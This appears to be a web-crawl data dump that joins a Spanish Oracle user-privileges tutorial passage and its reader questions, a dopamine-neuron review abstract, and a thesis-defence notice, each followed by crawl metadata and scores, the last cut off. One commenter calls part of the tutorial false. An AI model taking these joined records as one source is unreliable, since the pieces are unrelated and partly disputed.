Con las secuencias pasa lo mismo que con los anteriores objetos vistos, para otorgar permisos se utiliza GRANT. Los permisos que podemos otorgar a una secuencia es SELECT o ALTER.
Privilegio sobre un paquete,función o procedimiento:
Los permisos que podemos otorgar a las funciones, paquetes o procedimientos almacenados en nuestra base de datos son los siguientes: EXECUTE, DEBUG.
QUITANDO PRIVILEGIOS
Si queremos quitar un privilegio a uno de estos objetos haremos lo mismo que con GRANT pero utilizando la sentencia REVOKE.
SQL > REVOKE ALL ON tabla_usuarios FROM david
About: admin
43 thoughts on “Administración de usuarios en Oracle”
1. En un principio si desaparece el objeto desaparecen los privilegios asociados a este.
La vista donde puedes ver los privilegios que hay en tu base de datos otorgados es user_tab_privs_made
2. hola estoy aprendiendo esto del oracle y tengo una pregunta.. luego de otorgar el permiso a un usuario, como hago para hacer uso de ese permiso desde el otro usuario??? no se como se pone..
3. Hola
Si tienes un usuario USER1 con una tabla TABLE1 y le das ese permiso al usuario USER2 para que pueda seleccionar las filas de esa tabla
sql> grant select on user1.table1 to user2
Arhora puedes realizar select desde USER2 a esa tabla de la siguiente formas:
Haces login con USER2 y realizas la siguiente consulta
select * from user1.table1;
Si quieres evitar poner delante de table1 el usuario propietario de esta tabla ( USER1) para que sea visible, la opcion que tienes es crear un sinonimo sobre la tabla TABLE1 de tal forma que USER2 pueda hacer
select * from TABLE1; y pueda ver los resultados de esta tabla
4. para controlar el número de procesos os remito a los parametros de inicalización en el init.ora
PROCESSES:Máximo número de procesos de SO que pueden acceder de forma
concurrente. Mínimo: 1 por usuario + procesos de arrancados con cada instancia.
Si varía el número máximo de este valor no nos tenemos que olvidar de echar un vistado a los pararámtros
transactions y sessions que están directamente ligados con este.
5. Hola. Instale Oracle 9i pero cuando intento entrar por SQL Plus mediante el usuario de prueba scott y la contraseña tiger no se que valor colocar en «Host String» ¿que me sugieren? He probado con varios valores y me dan los siguientes errores: ORA-12541: TNS no listener ó ORA-12154: TNS Could not resolve service name.
De antemano muy Agradecido por su ayuda.
6. En un princio el error que estas recibiendo se refiere a que el listener de la base de datos no está levantado o no se reconoce el descriptor de la base de datos para la conexion, por lo tanto cuando intentes conectarte con cualquiera de los usuarios a través de sql plus vas a obtener ese error.
Intenta levantar el listener de la base de datos, y en caso de que este esté levantado revisar los ficheros de red de oracle ( sqlnet.ora y tnsnames.ora ) con el fin de ver si el sid de la base de datos al que te estás conecntado es el correcto.
utiliza el comando tnsping descriptor_base_de_datos para ver si el listener está levantado y el descriptor de conexión es correcto.
Puedes echar un vistazo a http://www.orasite.com/tutoriales/archivos-configuracion-red-oracle.html
7. Hola!
Quiero crear un usuario que tenga premiso para crear tablas pero no para crearlas. Al darle privilegio de CRATE TABLE, debe ser que lleva implícito el de borrarla, no?
Como puedo hacerlo?
8. Hola [email protected] ,
la verdad es que sin una copia de seguridad es complicado realizar una recuperación de la base de datos.
Cuál es el caso en concreto, que error tienes. Si la base de datos está en modo archivelog y da algún fallo en alguno de los datafiles, puede que si sea posible
recuperar la instancia hasta un punto estable.
9. Tengo que cargar una tabla partiendo de un fichero con un INSERT y un UPDATE. Si la carga es correcta tiene que marcarlo un testigo en el UPDATE, pero si no lo es el testigo no debe marcar nada.
El problema es que sí que lo marca cuando la carga no es correcta, cómo puedo solucionarlo?
10. Hola,
quisiera saber si alguien sabe como liberar el espacio utilizado desde un tablespace Temporal una vez que ya finaliz´la query que estaba utilizando el tablespace TEMP?
11. Tengo una pregunta, si yo tengo un usuario con privilegios de SYSDBA y posteriormente lo quiero limitar… los privilegios otorgados por este usuario ¿serán revocados al resto de usuarios?.
Gracias.
12. Que estructuras del sistema debo verificar para obtener los privilegios de un usuario, y como obtengo una descripcion de los diferentes privilegios exixtentes oracle.Muchas gracias.
13. Hola… soy nuevo en esto de oracle y tengo una pregunta!
Cuando yo creo usuarios en oracle puedo crear usuario que pueden crear, borrar, actualizar tablas en un esquema pero tambien puedo crear usuarios los cuales solo van a poder hacer select, insert, delete or update sobre esas tablas… es asi o estoy equivocado?
Gracias!
14. Hola, tengo una duda sobre el REVOKE para quitados de permisos, existe el revoke en cascada y restricto? en ese caso, cual es por defecto?….otra pregunta: la cantidad de permisos es acumulativo? es decir se tiene una pila de permisos por usuario?, por ejemplo el usuario U1 le da permiso de UPDATE sobre tabla A al usuario U2 y tambien permiso de otorgarselo a otros usuarios, el Usuario U2 le da este mismo permiso al U3. Si el usuario U3 ya tenia este permiso, se le acumula? osea, si ahora el U2 le quita el permiso al U3, el U3 lo sigue teniendo porque otro usuario ya se lo habia otorgado antes?
15. eh estado leyendo ultimamente.. y para poder crear una base de datos en el arbol.. necesito crear un usuario.. pero como hago la creacion, porq hast donde se no sea crea igual que un usuario que accesa a la BD… me podrian ayudar…!! me urge porque tengo q terminar un proyecto… por favor..!!!
16. Hola…estoy cursando mi materia de oracle….tengo dos maquinas en red…pero en una me puse a ingresar los datos de las tablas con el insert…despues quise ingresar desde la otra maquina pero no me salen los datos de las tablas me imagino que al insertar datos en una maquina en la otra no se guardan…lo que quiero que me ayuden es en como hago un backup a la otra maquina. Mil gracias por tu ayuda.
17. Hola, espero puedan ayudarme. Estoy trabajando sobre un esquema DBMIGRAC y tengo que acceder a las tablas que están en otro esquema llamado AUSLOG, en DBMIGRAC tengo los pkg y yo hago lo siguiente:
INSERT INTO AUSLOG.CONTACT (name,
last_name)
select m_name, m_last_name from m_persona;
Esto funciona en el editor de TOAD correctamente, pero en el cuerpo del pkg me da error de compilación. Me dice que no existe la tabla o vista y se posiciona sobre la línea de INSERT.
Alguien podría ayudarme? por favor, es bastante urgente…no sé si me falta algo.
Muchas gracias de antemano!
18. Hola, se puede implementar una politica para que ademas de que un usuario de oracle pueda modificar una tabla, sea de un usuario de Red en especifico…
19. Es falso lo que se indica en el apartado de autenticacion externa ya que las cuentas de usuario si se guardan en la BBDD. Lo que no se guardan son las contraseñas. Tampoco es cierto que las cuentas esten SIEMPRE referidas con OPS$
20. Buenos días, yo tengo una duda, imaginemos que tenemos dos usuarios, user1 y user2, de los cuales user1 ha creado un número elevado de tablas y queremos darle unicamente permiso al user2 de lectura como se puede hacer????
Gracías
Deja una respuesta
Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *
|
{
"url": "https://orasite.com/tutoriales/administracion/administracion-de-usuarios-en-oracle",
"source_domain": "orasite.com",
"snapshot_id": "CC-MAIN-2023-06",
"warc_metadata": {
"Content-Length": "115675",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:XARE7LJTMAJJSR4SBXYG4TWPHSBV47QV",
"WARC-Concurrent-To": "<urn:uuid:845844d0-d465-4131-9b47-6725706b2578>",
"WARC-Date": "2023-02-09T09:17:45Z",
"WARC-IP-Address": "51.178.26.104",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:MQPL6ZYG2D7Q4UWICVDEW73BI6FAQIA4",
"WARC-Record-ID": "<urn:uuid:d7ec2088-3d7f-4cf9-a96e-8de7095edfd2>",
"WARC-Target-URI": "https://orasite.com/tutoriales/administracion/administracion-de-usuarios-en-oracle",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:8a89dfe8-15b5-4970-abdc-f296e64d55ae>"
},
"warc_info": "isPartOf: CC-MAIN-2023-06\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for January/February 2023\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-78\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
37,
38,
62,
63,
297,
298,
481,
482,
594,
595,
597,
598,
622,
623,
808,
809,
842,
843,
1075,
1076,
1123,
1124,
1221,
1222,
1245,
1246,
1418,
1419,
1609,
1610,
1661,
1662,
1801,
1802,
1804,
1805,
1827,
1828,
2046,
2047,
2122,
2123,
2201,
2202,
2347,
2348,
2350,
2351,
2382,
2383,
2447,
2448,
2573,
2574,
2646,
2647,
2738,
2739,
2788,
2789,
2914,
2915,
2962,
2963,
2965,
2966,
3016,
3017,
3403,
3404,
3502,
3503,
3696,
3697,
3747,
3748,
3750,
3751,
3788,
3789,
3958,
3959,
4021,
4022,
4068,
4093,
4119,
4145,
4146,
4260,
4261,
4310,
4311,
4313,
4314,
4336,
4337,
4530,
4531,
4561,
4562,
4564,
4565,
4598,
4599,
4747,
4868,
5047,
5178,
5179,
5315,
5316,
5326,
5327,
5355,
5356,
5398,
5399,
5571,
5572,
5624,
5625,
5744,
5745,
5790,
5842,
5843,
5871,
5872,
5988,
6072,
6073,
6149,
6150,
6192,
6193,
6260,
6261,
6306,
6358,
6359,
6391,
6392,
6572,
6573,
6626,
6627,
6776,
6777,
6779,
6780,
6801,
6802,
6926,
6927,
6973,
6974,
6976,
6977,
6990,
6991,
6992,
7046,
7047,
7138,
7139,
7246,
7247,
7442,
7443,
7453,
7454,
7594,
7595,
7642,
7643,
7725,
7726,
7785,
7786,
7818,
7819,
8032,
8033,
8100,
8101,
8202,
8203,
8277,
8278,
8362,
8363,
8472,
8473,
8542,
8543,
8868,
8869,
8914,
8915,
9217,
9218,
9468,
9469,
9605,
9606,
9709,
9710,
9721,
9722,
9894,
9895,
9919,
9920,
9952,
9953,
10062,
10063,
10228,
10229,
10280,
10281,
10481,
10482,
10578,
10579,
10591,
10592,
10764,
10765,
10959,
10960,
10973,
10974,
11162,
11163,
11225,
11226,
11489,
11490,
11503,
11504,
12111,
12112,
12410,
12411,
12812,
12813,
13017,
13018,
13056,
13057,
13072,
13073,
13120,
13121,
13309,
13310,
13394,
13395,
13427,
13428,
13585,
13586,
13823,
13824,
14052,
14053,
14065,
14066,
14085,
14086
],
"line_end_idx": [
37,
38,
62,
63,
297,
298,
481,
482,
594,
595,
597,
598,
622,
623,
808,
809,
842,
843,
1075,
1076,
1123,
1124,
1221,
1222,
1245,
1246,
1418,
1419,
1609,
1610,
1661,
1662,
1801,
1802,
1804,
1805,
1827,
1828,
2046,
2047,
2122,
2123,
2201,
2202,
2347,
2348,
2350,
2351,
2382,
2383,
2447,
2448,
2573,
2574,
2646,
2647,
2738,
2739,
2788,
2789,
2914,
2915,
2962,
2963,
2965,
2966,
3016,
3017,
3403,
3404,
3502,
3503,
3696,
3697,
3747,
3748,
3750,
3751,
3788,
3789,
3958,
3959,
4021,
4022,
4068,
4093,
4119,
4145,
4146,
4260,
4261,
4310,
4311,
4313,
4314,
4336,
4337,
4530,
4531,
4561,
4562,
4564,
4565,
4598,
4599,
4747,
4868,
5047,
5178,
5179,
5315,
5316,
5326,
5327,
5355,
5356,
5398,
5399,
5571,
5572,
5624,
5625,
5744,
5745,
5790,
5842,
5843,
5871,
5872,
5988,
6072,
6073,
6149,
6150,
6192,
6193,
6260,
6261,
6306,
6358,
6359,
6391,
6392,
6572,
6573,
6626,
6627,
6776,
6777,
6779,
6780,
6801,
6802,
6926,
6927,
6973,
6974,
6976,
6977,
6990,
6991,
6992,
7046,
7047,
7138,
7139,
7246,
7247,
7442,
7443,
7453,
7454,
7594,
7595,
7642,
7643,
7725,
7726,
7785,
7786,
7818,
7819,
8032,
8033,
8100,
8101,
8202,
8203,
8277,
8278,
8362,
8363,
8472,
8473,
8542,
8543,
8868,
8869,
8914,
8915,
9217,
9218,
9468,
9469,
9605,
9606,
9709,
9710,
9721,
9722,
9894,
9895,
9919,
9920,
9952,
9953,
10062,
10063,
10228,
10229,
10280,
10281,
10481,
10482,
10578,
10579,
10591,
10592,
10764,
10765,
10959,
10960,
10973,
10974,
11162,
11163,
11225,
11226,
11489,
11490,
11503,
11504,
12111,
12112,
12410,
12411,
12812,
12813,
13017,
13018,
13056,
13057,
13072,
13073,
13120,
13121,
13309,
13310,
13394,
13395,
13427,
13428,
13585,
13586,
13823,
13824,
14052,
14053,
14065,
14066,
14085,
14086,
14184
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 14184,
"ccnet_original_nlines": 272,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.08689024299383163,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.09527438879013062,
"rps_doc_frac_lines_end_with_ellipsis": 0.003662999952211976,
"rps_doc_frac_no_alph_words": 0.13452744483947754,
"rps_doc_frac_unique_words": 0.2956751883029938,
"rps_doc_mean_word_length": 4.979700088500977,
"rps_doc_num_sentences": 132,
"rps_doc_symbol_to_word_ratio": 0.006478659808635712,
"rps_doc_unigram_entropy": 5.522583961486816,
"rps_doc_word_count": 2266,
"rps_doc_frac_chars_dupe_10grams": 0.02702941931784153,
"rps_doc_frac_chars_dupe_5grams": 0.12371499091386795,
"rps_doc_frac_chars_dupe_6grams": 0.07178305834531784,
"rps_doc_frac_chars_dupe_7grams": 0.05334987863898277,
"rps_doc_frac_chars_dupe_8grams": 0.03943637013435364,
"rps_doc_frac_chars_dupe_9grams": 0.03358738124370575,
"rps_doc_frac_chars_top_2gram": 0.014356610365211964,
"rps_doc_frac_chars_top_3gram": 0.02534561976790428,
"rps_doc_frac_chars_top_4gram": 0.020737329497933388,
"rps_doc_books_importance": -1308.75146484375,
"rps_doc_books_importance_length_correction": -1308.75146484375,
"rps_doc_openwebtext_importance": -685.5226440429688,
"rps_doc_openwebtext_importance_length_correction": -685.5226440429688,
"rps_doc_wikipedia_importance": -512.4522094726562,
"rps_doc_wikipedia_importance_length_correction": -512.4522094726562
},
"fasttext": {
"dclm": 0.9119155406951904,
"english": 0.0012582700001075864,
"fineweb_edu_approx": 1.1994664669036865,
"eai_general_math": 0.00013946999388281256,
"eai_open_web_math": 0.5535803437232971,
"eai_web_code": 0.8114787340164185
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.445",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.758",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "5",
"label": "Social/Forum"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "23",
"label": "Tutorial"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
2,895,129,056,884,419,600
|
Excitability of Dopamine Neurons: Modulation and Physiological Consequences | BenthamScience
Excitability of Dopamine Neurons: Modulation and Physiological Consequences
Author(s): F. J. White, X- T. Hu, M. Marinelli, C. N. Rudick.
Journal Name: CNS & Neurological Disorders - Drug Targets
Volume 5 , Issue 1 , 2006
Abstract:
This aim of this chapter is to review literature on the excitability and function of dopamine neurons that originate in the midbrain and project to cortico-limbic and motor structures (A9 and A10 dopamine pathways). Electrophysiological studies on rodent or non-human primates have shown that these dopamine neurons are silent or spontaneously active. The spontaneously active neurons show slow regular firing, slow irregular firing or fast bursting activity. In the first section, we will review how neuronal firing is modulated by intrinsic factors, such as impulseregulating somatodendritic dopamine autoreceptors, a balance between inward voltage-gated sodium and calcium currents and outward potassium currents. We will then review the major excitatory and inhibitory pathways that play important roles in modulating dopamine cell excitability. In the second section, we will discuss how, in addition to being modulated by intrinsic and synaptic factors, excitability of dopamine neurons can also be modulated by life experiences. Dopamine neurons change their firing rate throughout the developmental period, their activity can be modified by stressful life events, and the firing mode can change as a consequence of acute or repeated exposure to psychoactive drugs. Finally, these cells change their firing pattern in response to behaviorally relevant stimuli and learning experiences. We will conclude by discussing how changes in the physiology of the dopamine neurons could participate in the development or exacerbation of psychiatric conditions such as drug addiction.
Keywords: stress, addiction, electrophysiology, Dopamine, ventral tegmental area, synaptic
Rights & PermissionsPrintExport
Article Details
VOLUME: 5
ISSUE: 1
Year: 2006
Page: [79 - 97]
Pages: 19
DOI: 10.2174/187152706784111542
Article Metrics
PDF: 40
HTML: 0
EPUB: 0
PRC: 0
|
{
"url": "http://www.eurekaselect.com/57570/article",
"source_domain": "www.eurekaselect.com",
"snapshot_id": "crawl=CC-MAIN-2018-17",
"warc_metadata": {
"Content-Length": "66802",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:PATFANK6VAKB7XN7XYBRRXYWJBDQ6WKP",
"WARC-Concurrent-To": "<urn:uuid:fdbf27a6-f20f-40d4-86af-3fccdd40ab53>",
"WARC-Date": "2018-04-25T22:03:00Z",
"WARC-IP-Address": "52.215.14.9",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:W57I6KUH7DB3RHC3O5VQ4SLNXM7C223P",
"WARC-Record-ID": "<urn:uuid:d63dc592-4d02-411c-b17d-191fe59033e1>",
"WARC-Target-URI": "http://www.eurekaselect.com/57570/article",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:0494f91a-37ba-4a55-bd74-a932bbf0f748>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-228-193-233.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2018-17\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for April 2018\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
95,
96,
172,
173,
235,
236,
294,
295,
321,
322,
332,
333,
1914,
1915,
2006,
2007,
2039,
2040,
2056,
2057,
2067,
2076,
2087,
2103,
2113,
2145,
2146,
2162,
2163,
2171,
2179,
2187
],
"line_end_idx": [
95,
96,
172,
173,
235,
236,
294,
295,
321,
322,
332,
333,
1914,
1915,
2006,
2007,
2039,
2040,
2056,
2057,
2067,
2076,
2087,
2103,
2113,
2145,
2146,
2162,
2163,
2171,
2179,
2187,
2193
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 2193,
"ccnet_original_nlines": 32,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.25984251499176025,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.04461941868066788,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.22047244012355804,
"rps_doc_frac_unique_words": 0.5876623392105103,
"rps_doc_mean_word_length": 5.837662220001221,
"rps_doc_num_sentences": 18,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.893216133117676,
"rps_doc_word_count": 308,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.07452724874019623,
"rps_doc_frac_chars_dupe_6grams": 0.07452724874019623,
"rps_doc_frac_chars_dupe_7grams": 0.07452724874019623,
"rps_doc_frac_chars_dupe_8grams": 0.07452724874019623,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.05839822068810463,
"rps_doc_frac_chars_top_3gram": 0.03781979903578758,
"rps_doc_frac_chars_top_4gram": 0.04838709905743599,
"rps_doc_books_importance": -216.6453857421875,
"rps_doc_books_importance_length_correction": -216.6453857421875,
"rps_doc_openwebtext_importance": -107.26537322998047,
"rps_doc_openwebtext_importance_length_correction": -107.26537322998047,
"rps_doc_wikipedia_importance": -93.27510070800781,
"rps_doc_wikipedia_importance_length_correction": -93.27510070800781
},
"fasttext": {
"dclm": 0.01981044001877308,
"english": 0.8705309629440308,
"fineweb_edu_approx": 2.9741969108581543,
"eai_general_math": 0.09926187992095947,
"eai_open_web_math": 0.263119101524353,
"eai_web_code": 0.0024136900901794434
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "612.822",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Physiology"
}
},
"secondary": {
"code": "612.82",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Physiology"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "4",
"label": "Advanced Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
497,510,049,000,104,800
|
Liens transverses ENS de Lyon
Agenda de l'ENS de Lyon
Multiple regulators mediate the transcriptional activities of ERRalpha and its capacity to promote cell invasion
Date
mer 05 sep 2018
Horaires
9h00
Lieu(x)
East China Normal University
Shanghai - RP CHINE
Intervenant(s)
Soutenance de thèse de Mlle Ling ZHANG de l'IGFL sous la direction de M. Jean-Marc VANACKER et sous la cotutelle de M.Jiemin WONG (ECNU)
Langue(s) des interventions
Description générale
ERRa is a nuclear receptor whose activity mainly depends on its interaction with transcription co-regulators. High levels of ERRa are found in various cancer types and correlate with poor prognosis. However, the mechanisms linking ERRα to cancer cell migration as well as the coregulators involved are unclear. In our study, we found two histone-modifying enzymes, LSD1 and SET7, acting as positive regulators of ERRα.
I. ERRa impacts the biochemical activities of the LSD1 demethylase. Activation of ERRa -LSD1 targets (identified by RNA-Seq) requires the recruitment of this complex at Transcriptional Start Sites (TSSs), which is achieved by the NRF1 transcription factor. In our study, we have shown several points: NRF1, but not ERRa , is involved in positioning LSD1 to TSS, whereas ERRa , but not NRF1, regulates LSD1 enzymatic activities towards demethylating H3K9me2.
II. A distinct group of ERRa target genes (identified by RNA-Seq) is under the control of the histone methyltransferase SET7 which mono-methylates H3K4. Appropriate recruitment of SET7 at TSSs is controlled by the ETS1 transcription factor, promoting the interaction between SET7-ERRa , leading to target gene expression.
Gene Ontology analysis revealed that ERRa -LSD1 co-targets, as well as ERRa -SET7 co-targets, are enriched in terms of cell invasion. Consistently, depletion of each of these factors, as well as depletion of NRF1 or ETS1, leads to reduced cell invasion capacities as observed in transwell assays or in vivo, using xenotransplantation in the zebrafish embryo.
Altogether, our results show two regulatory networks involving histone modifications induced by nuclear receptors, leading to increased cell invasion.
Gratuit
Mots clés
Disciplines
|
{
"url": "http://www.ens-lyon.fr/evenement/recherche/multiple-regulators-mediate-transcriptional-activities-erralpha-and-its?ctx=contexte",
"source_domain": "www.ens-lyon.fr",
"snapshot_id": "crawl=CC-MAIN-2019-22",
"warc_metadata": {
"Content-Length": "80628",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:BEITSN6S2K5TPYQLJMNJ2M3XTPDL5VNR",
"WARC-Concurrent-To": "<urn:uuid:965e00b4-28a8-4ae0-b2b0-0a7ce67f0327>",
"WARC-Date": "2019-05-24T02:06:15Z",
"WARC-IP-Address": "140.77.168.21",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:4JTUNUTROX6ZJTOEZKYNL6TYWQPYHQHK",
"WARC-Record-ID": "<urn:uuid:3da9181d-1f5e-4ae7-a669-77cda908807f>",
"WARC-Target-URI": "http://www.ens-lyon.fr/evenement/recherche/multiple-regulators-mediate-transcriptional-activities-erralpha-and-its?ctx=contexte",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:c6e10af3-ec78-4670-b213-9736c2e6c299>"
},
"warc_info": "isPartOf: CC-MAIN-2019-22\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for May 2019\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-47-182-244.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
30,
31,
55,
56,
169,
170,
175,
191,
200,
201,
206,
207,
215,
244,
245,
265,
266,
281,
282,
419,
420,
448,
449,
470,
471,
893,
1351,
1674,
2033,
2184,
2185,
2193,
2203
],
"line_end_idx": [
30,
31,
55,
56,
169,
170,
175,
191,
200,
201,
206,
207,
215,
244,
245,
265,
266,
281,
282,
419,
420,
448,
449,
470,
471,
893,
1351,
1674,
2033,
2184,
2185,
2193,
2203,
2214
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 2214,
"ccnet_original_nlines": 33,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.2696078419685364,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.08578430861234665,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1666666716337204,
"rps_doc_frac_unique_words": 0.6024464964866638,
"rps_doc_mean_word_length": 5.519877910614014,
"rps_doc_num_sentences": 17,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.984399318695068,
"rps_doc_word_count": 327,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.0265928003937006,
"rps_doc_frac_chars_top_3gram": 0.0132964001968503,
"rps_doc_frac_chars_top_4gram": 0.0132964001968503,
"rps_doc_books_importance": -170.5086669921875,
"rps_doc_books_importance_length_correction": -170.5086669921875,
"rps_doc_openwebtext_importance": -88.95734405517578,
"rps_doc_openwebtext_importance_length_correction": -88.95734405517578,
"rps_doc_wikipedia_importance": -65.62129211425781,
"rps_doc_wikipedia_importance_length_correction": -65.62129211425781
},
"fasttext": {
"dclm": 0.04061203822493553,
"english": 0.8819373250007629,
"fineweb_edu_approx": 2.163917303085327,
"eai_general_math": 0.14413821697235107,
"eai_open_web_math": 0.5883287787437439,
"eai_web_code": 0.008917390368878841
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "572.888",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Biology and Anthropology",
"level_3": "Anthropology"
}
},
"secondary": {
"code": "616.99",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "4",
"label": "Advanced Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
